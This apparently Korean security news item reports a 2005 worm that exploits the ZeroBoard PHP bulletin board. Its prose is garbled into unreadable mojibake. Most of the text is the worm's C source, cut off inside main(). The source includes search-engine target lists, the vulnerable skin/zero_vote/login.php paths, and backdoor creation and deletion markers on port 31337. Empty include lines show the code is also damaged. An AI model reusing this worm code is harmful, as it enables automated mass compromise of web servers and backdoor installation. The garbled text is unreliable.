±¹³»¿¡¼ ÁÖ·Î »ç¿ëµÇ°í ÀÖ´Â °Ô½ÃÆÇ ¼ºñ½ºÀÎ Á¦·Îº¸µå °Ô½ÃÆÇ ¼ºñ½º¸¦ °ø°ÝÇÏ´Â ÀͽºÇ÷ÎÀÕ ¹ÙÀÌ·¯½º°¡ ¹ß°ßµÇ¾ú´Ù.
2005³â 5¿ù 5ÀϺÎÅÍ ÇØ´ç Äڵ尡 ¿©·¯ ¿Ü±¹ »çÀÌÆ®¿¡ °ø°³µÇ¾úÀ¸¸ç Á¦·Îº¸µå´Â PHP¿Í MySQLÀÌ Áö¿øµÇ´Â ¼¹ö¿¡ ¼³Ä¡ÇÏ¿© »ç¿ëÇÏ´Â ±¹»ê °Ô½ÃÆÇÀÌ´Ù.
Äڵ峻ºÎ¿¡´Â ¾Æ·¡¿Í °°Àº ¹®ÀÚ¿ÀÌ Æ÷ÇԵǾî ÀÖ°í, Á¦·Îº¸µåÀÇ Ãë¾àÁ¡À» °ø°ÝÇÏ´Â ÀͽºÇ÷ÎÀÕ°ú °Ë»ö¿£ÁøÀ» ÀÌ¿ëÇÑ È®»ê¹æ¹ýÀ» »ç¿ëÇÑ´Ù.
ZeroBoard -1day INE w0rm
È®»ê¿¡ »ç¿ëµÇ´Â °Ë»ö¿£ÁøÀº ³×ÀÌÆ®´åÄÄ, ±¸±ÛÄÚ¸®¾Æ, ¾ßÈÄÄÚ¸®¾Æ, ³×ÀÌÆ®´åÄÄ, ¶óÀÌÄÚ½º, ¾ËŸºñ½ºÅ¸ ÄÚ¸®¾Æ µîÀÌ´Ù.
//search.nate.com
//www.google.co.kr
//kr.search.yahoo.com
//search.lycos.com
//kr.altavista.com
Á¦ÀÛÀÚ´Â Çѱ¹ÀÎÀ¸·Î ÃßÁ¤µÇ¸ç °Ë»ö¿£ÁøÀ» ÅëÇؼ ¾Æ·¡ Çü½ÄÀÇ Á¦·Îº¸µå °Ô½ÃÆÇÀ» °Ë»öÇϹǷΠ¾Æ·¡¿Í °°Àº °æ·Î¸¦ ¾²Áö ¾Ê´Â°ÍÀÌ ÁÁ°í, ÃֽŹöÀüÀ» Ç×»ó À¯ÁöÇϴ°ÍÀÌ ÁÁ´Ù°í ¹àÇû´Ù.
"/zboard/zboard.php"
"/zb41/zboard.php"
"/bbs/zboard.php"
"/zb/zboard.php"
"/zb40/zboard.php"
"/board/zboard.php"
"zboard.php"
"zboard.ph"
--------------------------------------------------------------------------------
/*
** ZeroBoard -1day INE w0rm
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef __sun__
#include
#endif /* __SunOS__ */
#define DEBUG_ING
#undef DEBUG_ING
#define TMP_FILE "./tmp.core"
#define CMD_FILE "./cmd.core"
#define PRC_FILE "./proc.core"
#define SCS (0)
#define MIN (1)
#ifdef __linux__
#define DEF_ETH "eth0"
#else
#ifdef __FreeBSD__
#define DEF_ETH "ed0"
#else
#ifdef __sun__
#define DEF_ETH "hme0"
#endif
#endif
#endif
#define MAX_BUF (0x0000ffff)
#define FIR_BUF (0x00000800)
#define SEC_BUF (0x00000400)
#define THR_BUF (0x00000200)
#define MIN_BUF (0x00000100)
#define VENDOR "nzeo.com"
// search rule
#define FD_RULE_0 "/zboard/zboard.php"
#define FD_RULE_1 "/zb41/zboard.php"
#define FD_RULE_2 "/bbs/zboard.php"
#define FD_RULE_3 "/zb/zboard.php"
#define FD_RULE_4 "/zb40/zboard.php"
#define FD_RULE_5 "/board/zboard.php"
#define FD_RULE_6 "zboard.php"
#define FD_RULE_7 "zboard.ph"
// pattern
#define FD_PATH_0 "/zboard/skin/zero_vote/login.php"
#define FD_PATH_1 "/zb41/skin/zero_vote/login.php"
#define FD_PATH_2 "/bbs/skin/zero_vote/login.php"
#define FD_PATH_3 "/zb/skin/zero_vote/login.php"
#define FD_PATH_4 "/zb40/skin/zero_vote/login.php"
#define FD_PATH_5 "/board/skin/zero_vote/login.php"
#define FD_PATH_6 "/skin/zero_vote/login.php"
#define RESULT_OK "200 OK"
#define MAKE_STR1 "BACKDOOR MAKE SUCCESS"
#define MAKE_STR2 "ZBCODE MAKE SUCCESS"
#define DELT_STR1 "BACKDOOR DELETE SUCCESS"
#define DELT_STR2 "ZBCODE DELETE SUCCESS"
#define DEF_PORT (31337)
#define CONN_PORT (80)
#define DEF_TIME (20)
int set_sock(char *sc_gt_host,int port,int type);
void re_connt_lm(int st_sock_va,int type);
int proc_r();
void t_kill();
void sf_exit();
int g_ip(char *ip);
int make_cmd_file();
int filter_f(char *test_bf,int tnum);
int sock;
struct tg_rl
{
int r_num;
char *r_str;
char *url_str;
};
#define TARGET_NUM (7)
#define SEARCH_NUM (4)
struct tg_rl __tg_rule_va[]=
{
{0,FD_RULE_0,FD_PATH_0},
{1,FD_RULE_1,FD_PATH_1},
{2,FD_RULE_2,FD_PATH_2},
{3,FD_RULE_3,FD_PATH_3},
{4,FD_RULE_4,FD_PATH_4},
{5,FD_RULE_5,FD_PATH_5},
{6,FD_RULE_6,FD_PATH_6},
{7,FD_RULE_7,FD_PATH_6},
{8,NULL,NULL}
};
struct search_rule
{
int num;
u_char *url;
int maxnum;
int defnum;
u_char *http_head;
};
struct search_rule search_va[]=
{
{0,"www.google.com",990,10,"//"},
{1,"kr.search.yahoo.com",990,15,"//"},
{2,"search.nate.com",480,10,"//"},
{3,"search.lycos.com",990,10,"//"},
{4,"kr.altavista.com",1000,10,"//"},
{5,NULL,0,0,NULL}
};
void t_kill()
{
#ifdef DEBUG_ING
fprintf(stdout,"time outn");
#endif
close(sock);
sock=-1;
signal(SIGALRM,SIG_DFL);
return;
}
void sf_exit()
{
#ifdef DEBUG_ING
fprintf(stdout,"safe exitn");
#endif
close(sock);
kill((int)proc_r(),9);
unlink(TMP_FILE);
unlink(CMD_FILE);
unlink(PRC_FILE);
exit(-1);
}
int main(int argc,char *argv[])
{
FILE *fp;
int tnum=(SCS);
int chk=(SCS);
int gogo=(SCS);
int whgl=(SCS);
int qnum=(SCS);
int tgrl_sl=(MIN);
int _conn_num=(SCS);
int port=(CONN_PORT);
int def_port=(DEF_PORT);
int sc_gt_sock;
int host_chk=(SCS);
u_char *gg_ptr=NULL;
u_char *t_ptr=NULL;
u_char __zr_bf[(MAX_BUF)];
u_char *port_ptr=NULL;
char pkt[(FIR_BUF)];
char host[(SEC_BUF)];
char url[(SEC_BUF)];
char test_bf[(MAX_BUF)];
char req_t_bf[(THR_BUF)];
char ip[(MIN_BUF)];
char atk_code[(MIN_BUF)];
signal(SIGINT,sf_exit);
signal(SIGTSTP,sf_exit);
while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)
{
extern char *optarg;
switch(whgl)
{
case 'S':
case 's':
tnum=atoi(optarg);
if(SEARCH_NUM
